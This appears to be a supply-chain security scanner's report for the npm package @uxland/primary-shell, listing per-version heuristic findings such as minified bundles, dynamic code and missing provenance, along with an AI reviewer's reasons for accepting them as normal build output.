@uxland/primary-shell
Primaria Shell
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | net-exec-file:dist/index-BUnSpNVB.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the app's documented event-class factory and React runtime, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-BUnSpNVB.js | AI (source-diff): Vite-generated bundle with hashed filename; minification is expected for this build toolchain. | ai | |
| source-diff | obfuscated-file:dist/index-DasFWYhc.js | AI (source-diff): Standard Vite-bundled minified output; long lines are expected in bundled dist files for this package. | ai | |
| source-diff | net-exec-file:dist/index-DasFWYhc.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the React shell bundle and event factory; not dropper behavior. | ai | |
| source-diff | net-exec-file:dist/index-8_KLfK7r.js | AI (source-diff): Network calls and dynamic code in a React app bundle are expected; no dropper pattern in sample. | ai | |
| source-diff | obfuscated-file:dist/index-8_KLfK7r.js | AI (source-diff): Standard Vite-minified bundle with source map; not obfuscated malware. | ai | |
| source-diff | obfuscated-file:dist/index-B0BnyHR2.js | AI (source-diff): Vite-bundled minified output; long lines are standard bundle artifact, not obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-B0BnyHR2.js | AI (source-diff): Network calls and dynamic code in a React app bundle are expected; no dropper pattern in sample. | ai | |
| source-diff | net-exec-file:dist/index-HxUANPyC.js | AI (source-diff): Network calls and dynamic code in bundled frontend app are expected; no dropper pattern in sample. | ai | |
| source-diff | obfuscated-file:dist/index-HxUANPyC.js | AI (source-diff): Standard Vite bundle output; sample shows legitimate React/reflect-metadata code, not obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-CW9SRbzE.js | AI (source-diff): Network calls and dynamic code (new Function) are part of normal React/inversify bundle, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-CW9SRbzE.js | AI (source-diff): Standard Vite build output; minified bundle is expected for this package. | ai | |
| source-diff | net-exec-file:dist/index-B7XP7G0f.js | AI (source-diff): Network calls and new Function() are part of the React shell app bundle, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-B7XP7G0f.js | AI (source-diff): Standard Vite bundle output; long lines are minified but not obfuscated — readable source map included. | ai | |
| source-diff | net-exec-file:dist/index-DSWQpDr0.js | AI (source-diff): Bundled SPA shell; network calls and Function() globalThis polyfill are expected in dist output. | ai | |
| source-diff | obfuscated-file:dist/index-DSWQpDr0.js | AI (source-diff): Vite bundle output with source map; minified but not obfuscated. Stable pattern for this package. | ai | |
| source-diff | obfuscated-file:dist/index-CNpXjSPp.js | AI (source-diff): Vite build bundle; minified output is expected for this package's dist folder. | ai | |
| source-diff | net-exec-file:dist/index-CNpXjSPp.js | AI (source-diff): Bundle includes reflect-metadata polyfill (Function constructor) and React app network calls; not malicious. | ai | |
| source-diff | net-exec-file:dist/index-CsqWoBVE.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the app bundle's normal operation, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-CsqWoBVE.js | AI (source-diff): Standard Vite-bundled minified output for a React shell app; not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/index-BPXzFbQm.js | AI (source-diff): Vite-bundled frontend shell; minified dist output with accompanying source map is expected for this package. | ai | |
| source-diff | net-exec-file:dist/index-BPXzFbQm.js | AI (source-diff): Network calls and dynamic code (new Function for event class creation) are part of the app's documented broker pattern, not dropper behavior. | ai | |
| source-diff | net-exec-file:dist/index-0V-xXwce.js | AI (source-diff): Network calls and dynamic code (new Function for event class factory) are part of the documented shell app bundle, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-0V-xXwce.js | AI (source-diff): Vite-bundled React/Lit shell app; minified dist output is expected and accompanied by a source map. | ai | |
| source-diff | net-exec-file:dist/index-mgf5fUfq.js | AI (source-diff): Network calls and dynamic code (new Function) are part of React/reflect-metadata bundle, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-mgf5fUfq.js | AI (source-diff): Vite-bundled frontend dist file; long lines are minified bundle output, not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/index-Dnyofefj.js | AI (source-diff): Large Vite bundle output; sample shows standard minified React code, not obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-Dnyofefj.js | AI (source-diff): Network+exec pattern in a bundled shell app is expected; no dropper behavior in sample. | ai | |
| source-diff | net-exec-file:dist/index-Z7V9O2zV.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the bundled app runtime, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-Z7V9O2zV.js | AI (source-diff): Vite-bundled React app output; minified lines are expected build artifacts, not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/index-td5IxyX5.js | AI (source-diff): Vite-bundled minified output with source map; not obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-td5IxyX5.js | AI (source-diff): Bundle includes reflect-metadata's Function() and axios; expected for this app shell. | ai | |
| source-diff | obfuscated-file:dist/index-BPEC-whC.js | AI (source-diff): Standard Vite bundle output; long lines are minified but not obfuscated — readable source and .map file both present. | ai | |
| source-diff | net-exec-file:dist/index-BPEC-whC.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the app's event-class factory and React runtime, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-kl9Zgtus.js | AI (source-diff): Standard Vite-bundled output; sample shows readable React/reflect-metadata code, not obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-kl9Zgtus.js | AI (source-diff): Network calls and dynamic code in a frontend shell bundle are expected; no dropper pattern in sample. | ai | |
| source-diff | net-exec-file:dist/index-ayzo4OJo.js | AI (source-diff): Network calls and dynamic code in a React frontend bundle are normal; no dropper pattern in the sample. | ai | |
| source-diff | obfuscated-file:dist/index-ayzo4OJo.js | AI (source-diff): Standard Vite-minified React bundle; long lines are expected in bundled output, not obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-CXxEmHmi.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the bundled React app and event factory pattern, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-CXxEmHmi.js | AI (source-diff): Vite-bundled frontend shell; large minified dist files are expected for this package. | ai | |
| source-diff | net-exec-file:dist/index-B9gGnkza.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the bundled app framework, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-B9gGnkza.js | AI (source-diff): Standard Vite bundle output; minified lines are expected for this build-tool-based package. | ai | |
| source-diff | net-exec-file:dist/index-DHrGHdzq.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the app shell's documented event-class factory; no dropper pattern. | ai | |
| source-diff | obfuscated-file:dist/index-DHrGHdzq.js | AI (source-diff): Vite-bundled frontend output; minification is expected for this package's dist artifacts. | ai | |
| bogus-package | bogus-package | AI (bogus-package): Internal/private shell app; sparse README and no keywords are expected for org-internal packages. | ai | |
| semgrep | semgrep:new-function-constructor | AI (semgrep): Used to dynamically create named event classes from controlled event name strings; not arbitrary user input. | ai |
Versions (showing 34 of 34)
| Version | Deps | Published |
|---|---|---|
| 7.44.2 | 2 / 20 | |
| 7.44.1 | 2 / 20 | |
| 7.43.5 | 2 / 20 | |
| 7.43.4 | 2 / 20 | |
| 7.43.3 | 2 / 20 | |
| 7.43.2 | 2 / 20 | |
| 7.43.1 | 2 / 20 | |
| 7.43.0 | 2 / 20 | |
| 7.42.0 | 2 / 20 | |
| 7.41.8 | 2 / 20 | |
| 7.41.7 | 2 / 20 | |
| 7.41.6 | 2 / 20 | |
| 7.41.5 | 2 / 20 | |
| 7.41.4 | 2 / 20 | |
| 7.41.3 | 2 / 20 | |
| 7.41.2 | 2 / 20 | |
| 7.41.1 | 2 / 20 | |
| 7.41.0 | 2 / 20 | |
| 7.40.4 | 2 / 20 | |
| 7.40.3 | 2 / 20 | |
| 7.40.2 | 2 / 20 | |
| 7.40.1 | 2 / 20 | |
| 7.40.0 | 2 / 20 | |
| 7.39.0 | 2 / 20 | |
| 7.38.5 | 2 / 20 | |
| 7.38.4 | 2 / 20 | |
| 7.38.3 | 2 / 20 | |
| 7.38.2 | 2 / 20 | |
| 7.38.1 | 2 / 20 | |
| 7.38.0 | 2 / 20 | |
| 7.37.2 | 2 / 20 | |
| 7.37.1 | 2 / 20 | |
| 7.37.0 | 2 / 20 | |
| 7.36.5 | 2 / 20 |
v7.44.2
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.44.1
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.43.5
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.43.4
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.43.3
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.43.2
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.43.1
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.43.0
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.42.0
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.8
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.7
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.6
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.5
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.4
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.3
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.2
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.1
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.41.0
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.40.4
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.40.3
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.40.2
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.40.1
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.40.0
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.39.0
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.38.5
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.38.4
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.38.3
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.38.2
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.38.1
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.38.0
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.37.2
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.37.1
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.37.0
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.36.5
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.